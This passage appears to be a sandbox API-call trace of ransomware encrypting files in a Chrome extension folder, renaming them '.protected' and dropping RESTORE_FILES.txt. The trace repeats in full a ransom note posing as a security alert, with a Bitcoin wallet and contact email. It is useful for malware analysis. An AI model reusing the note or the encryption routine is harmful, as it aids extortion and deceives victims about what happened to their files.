(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.110] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.110] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.110] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.110] CloseHandle (hObject=0x164) returned 1 [0079.110] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.111] lstrcmpiW (lpString1="uk", lpString2="Windows") returned -1 [0079.111] lstrcmpiW (lpString1="uk", lpString2="Program Files") returned 1 [0079.111] lstrcmpiW (lpString1="uk", lpString2="Program Files (x86)") returned 1 [0079.111] lstrcmpiW (lpString1="uk", lpString2="$Recycle.bin") returned 1 [0079.111] lstrcmpiW (lpString1="uk", lpString2="System Volume Information") returned 1 [0079.111] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk") returned 141 [0079.111] lstrcmpW (lpString1="uk", lpString2=".") returned 1 [0079.111] lstrcmpW (lpString1="uk", lpString2="..") returned 1 [0079.111] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk\\*") returned 143 [0079.111] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.111] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.111] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.111] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.111] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.111] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.111] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk\\.") returned 143 [0079.111] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.111] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.111] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.111] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.111] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.111] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.111] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.111] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk\\..") returned 144 [0079.111] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.111] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.111] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.111] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.111] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.111] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.112] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.112] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.112] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk\\messages.json") returned 155 [0079.112] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.112] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.112] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.112] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.112] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.113] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk\\messages.json") returned 155 [0079.113] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.113] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk\\messages.json") returned 155 [0079.113] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.113] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk\\messages.json") returned 155 [0079.113] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.113] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x108, lpOverlapped=0x0) returned 1 [0079.114] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffef8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.114] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x108, lpOverlapped=0x0) returned 1 [0079.114] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.114] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.114] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.114] CloseHandle (hObject=0x168) returned 1 [0079.114] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk\\messages.json.protected") returned 165 [0079.114] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk\\messages.json.protected")) returned 1 [0079.115] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.115] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.115] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk\\RESTORE_FILES.txt") returned 159 [0079.115] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.115] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.115] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.116] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.116] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.116] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.116] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.116] CloseHandle (hObject=0x164) returned 1 [0079.116] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.116] lstrcmpiW (lpString1="vi", lpString2="Windows") returned -1 [0079.117] lstrcmpiW (lpString1="vi", lpString2="Program Files") returned 1 [0079.117] lstrcmpiW (lpString1="vi", lpString2="Program Files (x86)") returned 1 [0079.117] lstrcmpiW (lpString1="vi", lpString2="$Recycle.bin") returned 1 [0079.117] lstrcmpiW (lpString1="vi", lpString2="System Volume Information") returned 1 [0079.117] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi") returned 141 [0079.117] lstrcmpW (lpString1="vi", lpString2=".") returned 1 [0079.117] lstrcmpW (lpString1="vi", lpString2="..") returned 1 [0079.117] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\*") returned 143 [0079.117] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.117] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.117] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.117] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.117] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.117] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.117] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\.") returned 143 [0079.117] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.117] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.117] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.117] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.117] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.117] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.117] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.117] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\..") returned 144 [0079.117] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.117] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.117] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.117] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.117] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.118] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.118] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.118] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.118] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\messages.json") returned 155 [0079.118] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.118] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.118] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.118] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.118] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.118] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\messages.json") returned 155 [0079.118] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.118] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\messages.json") returned 155 [0079.118] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.118] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\messages.json") returned 155 [0079.118] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.118] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xe1, lpOverlapped=0x0) returned 1 [0079.119] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff1f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.119] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xe1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xe1, lpOverlapped=0x0) returned 1 [0079.120] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.120] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.120] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.120] CloseHandle (hObject=0x168) returned 1 [0079.120] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\messages.json.protected") returned 165 [0079.120] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\messages.json.protected")) returned 1 [0079.121] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.121] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.121] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\RESTORE_FILES.txt") returned 159 [0079.121] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.121] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.121] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.122] lstrlenA 